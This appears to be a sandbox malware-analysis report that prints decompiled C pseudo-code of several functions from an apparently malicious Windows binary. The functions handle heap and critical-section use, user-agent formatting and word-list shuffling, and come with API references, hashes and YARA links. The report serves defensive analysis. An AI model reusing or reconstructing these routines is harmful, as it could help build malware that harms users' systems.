                                                                                                                                                                                                                                0x00a8208d
                                                                                                                                                                                                                                0x00a8208d
                                                                                                                                                                                                                                0x00a8209a
                                                                                                                                                                                                                                0x00a820a2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a820a4
                                                                                                                                                                                                                                0x00a820b1
                                                                                                                                                                                                                                0x00a820b7
                                                                                                                                                                                                                                0x00a820b7
                                                                                                                                                                                                                                0x00a820ba
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a820c7
                                                                                                                                                                                                                                0x00a820db
                                                                                                                                                                                                                                0x00a82111
                                                                                                                                                                                                                                0x00a82114
                                                                                                                                                                                                                                0x00a82117
                                                                                                                                                                                                                                0x00a8211f
                                                                                                                                                                                                                                0x00a82125
                                                                                                                                                                                                                                0x00a8212a
                                                                                                                                                                                                                                0x00a8212a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8211f
                                                                                                                                                                                                                                0x00a820dd
                                                                                                                                                                                                                                0x00a820e4
                                                                                                                                                                                                                                0x00a820ec
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a820ee
                                                                                                                                                                                                                                0x00a820f4
                                                                                                                                                                                                                                0x00a820fc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82103
                                                                                                                                                                                                                                0x00a82103
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82103
                                                                                                                                                                                                                                0x00a820fc
                                                                                                                                                                                                                                0x00a820c4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82106
                                                                                                                                                                                                                                0x00a82106
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A8214A
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A820BE
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000), ref: 00A820CE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A820EE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 35602742-1701360479
                                                                                                                                                                                                                                • Opcode ID: c4b30c1d64f9a3e644e688a2d1df5a670d79abed861bd072db985dc76e3b458f
                                                                                                                                                                                                                                • Instruction ID: 1d83d7333d8e381500718d89ad9d43f5ab22cbdadd7d3a9a17d8bc941050fdb9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4b30c1d64f9a3e644e688a2d1df5a670d79abed861bd072db985dc76e3b458f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3141B2B1D00209EFDF20EFA4DD88ABEBBB9FB04745F204569E602E6250D6309E45DB61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A845CF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                			E00A845CF(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xa8d364; // 0x1ae95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xa8d364; // 0x1ae95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xa8d030) {
					HeapFree( *0xa8d270, 0, _t8);
				}
				_t9 = E00A85341(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0xa8d364; // 0x1ae95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                                                                                                                                                                                                0x00a845cf
                                                                                                                                                                                                                                0x00a845cf
                                                                                                                                                                                                                                0x00a845d8
                                                                                                                                                                                                                                0x00a845e8
                                                                                                                                                                                                                                0x00a845e8
                                                                                                                                                                                                                                0x00a845ed
                                                                                                                                                                                                                                0x00a845f2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a845e2
                                                                                                                                                                                                                                0x00a845e2
                                                                                                                                                                                                                                0x00a845f4
                                                                                                                                                                                                                                0x00a845f8
                                                                                                                                                                                                                                0x00a8460a
                                                                                                                                                                                                                                0x00a8460a
                                                                                                                                                                                                                                0x00a84615
                                                                                                                                                                                                                                0x00a8461a
                                                                                                                                                                                                                                0x00a8461d
                                                                                                                                                                                                                                0x00a84622
                                                                                                                                                                                                                                0x00a84626
                                                                                                                                                                                                                                0x00a8462c

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(01AE9570), ref: 00A845D8
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00A85884), ref: 00A845E2
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00A85884), ref: 00A8460A
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(01AE9570), ref: 00A84626
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: 715eb11b8cd9a5ff2720f6423934e28efb9bc88b6afcf7c370aae08400095f6c
                                                                                                                                                                                                                                • Instruction ID: f36d7352ffa1e43aab6776a192a3a849cf0e49a4a59531a2e012da104bdea054
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 715eb11b8cd9a5ff2720f6423934e28efb9bc88b6afcf7c370aae08400095f6c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3F0D470A04241DBDB25EFA9EE48F1A3BB4FB15790B044415F542CB6A1E730E952DB25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A85701, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E00A85701(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00A82CC9();
				if(_t21 != 0) {
					_t59 =  *0xa8d294; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xa8d294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xa8d12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00A82A45( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xa8d2e0; // 0x105a5a8
					if( *0xa8d294 > 5) {
						_t8 = _t26 + 0xa8e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xa8e9f9; // 0x44283a44
						_t27 = _t7;
					}
					E00A8276B(_t27, _t27);
					_t31 = E00A81DF5(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xa8d2a8 =  *0xa8d2a8 ^ 0x81bbe65d;
						_t32 = E00A85157(0x60);
						 *0xa8d364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xa8d364; // 0x1ae95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xa8d364; // 0x1ae95b0
							 *_t51 = 0xa8e823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xa8d270, 0, 0x43);
							 *0xa8d300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xa8d294; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xa8d2e0; // 0x105a5a8
								_t13 = _t58 + 0xa8e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xa8c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00A89DE1( ~_v8 &  *0xa8d2a8, 0xa8d00c); // executed
								_t42 = E00A8235B(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00A86EDD(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00A89FF2(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E00A8A23E(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xa8d128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00A86ABB(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                                                                                                                                                                                                0x00a85701
                                                                                                                                                                                                                                0x00a8570c
                                                                                                                                                                                                                                0x00a8570f
                                                                                                                                                                                                                                0x00a85712
                                                                                                                                                                                                                                0x00a85715
                                                                                                                                                                                                                                0x00a8571c
                                                                                                                                                                                                                                0x00a8571e
                                                                                                                                                                                                                                0x00a8572a
                                                                                                                                                                                                                                0x00a8572c
                                                                                                                                                                                                                                0x00a8572c
                                                                                                                                                                                                                                0x00a85735
                                                                                                                                                                                                                                0x00a8573b
                                                                                                                                                                                                                                0x00a85740
                                                                                                                                                                                                                                0x00a8575a
                                                                                                                                                                                                                                0x00a85766
                                                                                                                                                                                                                                0x00a85768
                                                                                                                                                                                                                                0x00a8576d
                                                                                                                                                                                                                                0x00a85777
                                                                                                                                                                                                                                0x00a85777
                                                                                                                                                                                                                                0x00a8576f
                                                                                                                                                                                                                                0x00a8576f
                                                                                                                                                                                                                                0x00a8576f
                                                                                                                                                                                                                                0x00a8576f
                                                                                                                                                                                                                                0x00a8577e
                                                                                                                                                                                                                                0x00a8578b
                                                                                                                                                                                                                                0x00a85792
                                                                                                                                                                                                                                0x00a85797
                                                                                                                                                                                                                                0x00a85797
                                                                                                                                                                                                                                0x00a8579f
                                                                                                                                                                                                                                0x00a857a2
                                                                                                                                                                                                                                0x00a857c8
                                                                                                                                                                                                                                0x00a857d4
                                                                                                                                                                                                                                0x00a857d9
                                                                                                                                                                                                                                0x00a857de
                                                                                                                                                                                                                                0x00a857e0
                                                                                                                                                                                                                                0x00a8580c
                                                                                                                                                                                                                                0x00a8580e
                                                                                                                                                                                                                                0x00a857e2
                                                                                                                                                                                                                                0x00a857e6
                                                                                                                                                                                                                                0x00a857eb
                                                                                                                                                                                                                                0x00a857f0
                                                                                                                                                                                                                                0x00a857f7
                                                                                                                                                                                                                                0x00a857fd
                                                                                                                                                                                                                                0x00a85802
                                                                                                                                                                                                                                0x00a85808
                                                                                                                                                                                                                                0x00a8580f
                                                                                                                                                                                                                                0x00a85811
                                                                                                                                                                                                                                0x00a85813
                                                                                                                                                                                                                                0x00a85822
                                                                                                                                                                                                                                0x00a85828
                                                                                                                                                                                                                                0x00a8582d
                                                                                                                                                                                                                                0x00a8582f
                                                                                                                                                                                                                                0x00a8585f
                                                                                                                                                                                                                                0x00a85861
                                                                                                                                                                                                                                0x00a85831
                                                                                                                                                                                                                                0x00a85831
                                                                                                                                                                                                                                0x00a85837
                                                                                                                                                                                                                                0x00a85844
                                                                                                                                                                                                                                0x00a8584a
                                                                                                                                                                                                                                0x00a8584a
                                                                                                                                                                                                                                0x00a85852
                                                                                                                                                                                                                                0x00a8585b
                                                                                                                                                                                                                                0x00a85862
                                                                                                                                                                                                                                0x00a85864
                                                                                                                                                                                                                                0x00a85866
                                                                                                                                                                                                                                0x00a8586d
                                                                                                                                                                                                                                0x00a8587a
                                                                                                                                                                                                                                0x00a8587f
                                                                                                                                                                                                                                0x00a85884
                                                                                                                                                                                                                                0x00a85886
                                                                                                                                                                                                                                0x00a85888
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8588a
                                                                                                                                                                                                                                0x00a8588f
                                                                                                                                                                                                                                0x00a85891
                                                                                                                                                                                                                                0x00a85898
                                                                                                                                                                                                                                0x00a8589c
                                                                                                                                                                                                                                0x00a8589f
                                                                                                                                                                                                                                0x00a858b4
                                                                                                                                                                                                                                0x00a858b8
                                                                                                                                                                                                                                0x00a858bd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a858bd
                                                                                                                                                                                                                                0x00a858a1
                                                                                                                                                                                                                                0x00a858a3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a858ae
                                                                                                                                                                                                                                0x00a858b0
                                                                                                                                                                                                                                0x00a858b2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a858b2
                                                                                                                                                                                                                                0x00a85895
                                                                                                                                                                                                                                0x00a85895
                                                                                                                                                                                                                                0x00a85866
                                                                                                                                                                                                                                0x00a857a4
                                                                                                                                                                                                                                0x00a857a4
                                                                                                                                                                                                                                0x00a857a9
                                                                                                                                                                                                                                0x00a858bf
                                                                                                                                                                                                                                0x00a858c3
                                                                                                                                                                                                                                0x00a858cb
                                                                                                                                                                                                                                0x00a858cb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a858c3
                                                                                                                                                                                                                                0x00a857af
                                                                                                                                                                                                                                0x00a857b2
                                                                                                                                                                                                                                0x00a857bc
                                                                                                                                                                                                                                0x00a857c3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a858d3
                                                                                                                                                                                                                                0x00a858d3
                                                                                                                                                                                                                                0x00a858d7
                                                                                                                                                                                                                                0x00a858db
                                                                                                                                                                                                                                0x00a858db

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A82CC9: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A8571A,00000000,00000000), ref: 00A82CD8
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00A85797
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A857E6
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(01AE9570), ref: 00A857F7
                                                                                                                                                                                                                                  • Part of subcall function 00A8A23E: memset.NTDLL ref: 00A8A253
                                                                                                                                                                                                                                  • Part of subcall function 00A8A23E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00A8A295
                                                                                                                                                                                                                                  • Part of subcall function 00A8A23E: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00A8A2A0
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00A85822
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A85852
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4246211962-0
                                                                                                                                                                                                                                • Opcode ID: 65370111fe859a40434f26d719449113e1fadb3b2d0a7d4317e62b93fad7d944
                                                                                                                                                                                                                                • Instruction ID: d3c8ac3dbcbb266f782fd804f213659fcb4cbea95222ac2a2a23bd682cb699ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65370111fe859a40434f26d719449113e1fadb3b2d0a7d4317e62b93fad7d944
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3851F171E01A24EBEB20FBF0DD89FAE77B8AB04710F144826F902E7191E77099029B51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A85CFD, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 22%
                                                                                                                                                                                                                                			E00A85CFD(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00A85157(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00A853BB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E00A85157((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xa8d2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                                                                                                                                                                                                0x00a85d04
                                                                                                                                                                                                                                0x00a85d0b
                                                                                                                                                                                                                                0x00a85d10
                                                                                                                                                                                                                                0x00a85d13
                                                                                                                                                                                                                                0x00a85d1a
                                                                                                                                                                                                                                0x00a85d1d
                                                                                                                                                                                                                                0x00a85d20
                                                                                                                                                                                                                                0x00a85d25
                                                                                                                                                                                                                                0x00a85d2a
                                                                                                                                                                                                                                0x00a85e7e
                                                                                                                                                                                                                                0x00a85e80
                                                                                                                                                                                                                                0x00a85e82
                                                                                                                                                                                                                                0x00a85e87
                                                                                                                                                                                                                                0x00a85e87
                                                                                                                                                                                                                                0x00a85d30
                                                                                                                                                                                                                                0x00a85d33
                                                                                                                                                                                                                                0x00a85d36
                                                                                                                                                                                                                                0x00a85d38
                                                                                                                                                                                                                                0x00a85d38
                                                                                                                                                                                                                                0x00a85d3c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85d40
                                                                                                                                                                                                                                0x00a85d6c
                                                                                                                                                                                                                                0x00a85d71
                                                                                                                                                                                                                                0x00a85d73
                                                                                                                                                                                                                                0x00a85d73
                                                                                                                                                                                                                                0x00a85d76
                                                                                                                                                                                                                                0x00a85d79
                                                                                                                                                                                                                                0x00a85d79
                                                                                                                                                                                                                                0x00a85d7b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85d46
                                                                                                                                                                                                                                0x00a85d48
                                                                                                                                                                                                                                0x00a85d67
                                                                                                                                                                                                                                0x00a85d67
                                                                                                                                                                                                                                0x00a85d7e
                                                                                                                                                                                                                                0x00a85d7e
                                                                                                                                                                                                                                0x00a85d7f
                                                                                                                                                                                                                                0x00a85d7f
                                                                                                                                                                                                                                0x00a85d82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85d82
                                                                                                                                                                                                                                0x00a85d4c
                                                                                                                                                                                                                                0x00a85d93
                                                                                                                                                                                                                                0x00a85d97
                                                                                                                                                                                                                                0x00a85e71
                                                                                                                                                                                                                                0x00a85e73
                                                                                                                                                                                                                                0x00a85e73
                                                                                                                                                                                                                                0x00a85e74
                                                                                                                                                                                                                                0x00a85e77
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85e77
                                                                                                                                                                                                                                0x00a85da0
                                                                                                                                                                                                                                0x00a85db1
                                                                                                                                                                                                                                0x00a85db5
                                                                                                                                                                                                                                0x00a85e6d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85e6d
                                                                                                                                                                                                                                0x00a85dbb
                                                                                                                                                                                                                                0x00a85dbe
                                                                                                                                                                                                                                0x00a85dc2
                                                                                                                                                                                                                                0x00a85dc6
                                                                                                                                                                                                                                0x00a85dcb
                                                                                                                                                                                                                                0x00a85e63
                                                                                                                                                                                                                                0x00a85e63
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85e69
                                                                                                                                                                                                                                0x00a85dd6
                                                                                                                                                                                                                                0x00a85ddf
                                                                                                                                                                                                                                0x00a85df3
                                                                                                                                                                                                                                0x00a85dfa
                                                                                                                                                                                                                                0x00a85e0f
                                                                                                                                                                                                                                0x00a85e15
                                                                                                                                                                                                                                0x00a85e1d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85e1f
                                                                                                                                                                                                                                0x00a85e1f
                                                                                                                                                                                                                                0x00a85e1f
                                                                                                                                                                                                                                0x00a85e26
                                                                                                                                                                                                                                0x00a85e2e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85e30
                                                                                                                                                                                                                                0x00a85e39
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85e3b
                                                                                                                                                                                                                                0x00a85e3d
                                                                                                                                                                                                                                0x00a85e40
                                                                                                                                                                                                                                0x00a85e40
                                                                                                                                                                                                                                0x00a85e43
                                                                                                                                                                                                                                0x00a85e47
                                                                                                                                                                                                                                0x00a85e4a
                                                                                                                                                                                                                                0x00a85e50
                                                                                                                                                                                                                                0x00a85e53
                                                                                                                                                                                                                                0x00a85e5a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85dd6
                                                                                                                                                                                                                                0x00a85d51
                                                                                                                                                                                                                                0x00a85d59
                                                                                                                                                                                                                                0x00a85d5f
                                                                                                                                                                                                                                0x00a85d61
                                                                                                                                                                                                                                0x00a85d61
                                                                                                                                                                                                                                0x00a85d64
                                                                                                                                                                                                                                0x00a85d66
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85d66
                                                                                                                                                                                                                                0x00a85d40
                                                                                                                                                                                                                                0x00a85d86
                                                                                                                                                                                                                                0x00a85d8b
                                                                                                                                                                                                                                0x00a85d8d
                                                                                                                                                                                                                                0x00a85d8d
                                                                                                                                                                                                                                0x00a85d90
                                                                                                                                                                                                                                0x00a85d90
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00A85DFA
                                                                                                                                                                                                                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 00A85E0F
                                                                                                                                                                                                                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00A85E26
                                                                                                                                                                                                                                • lstrlen.KERNEL32(69B25F45), ref: 00A85E4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
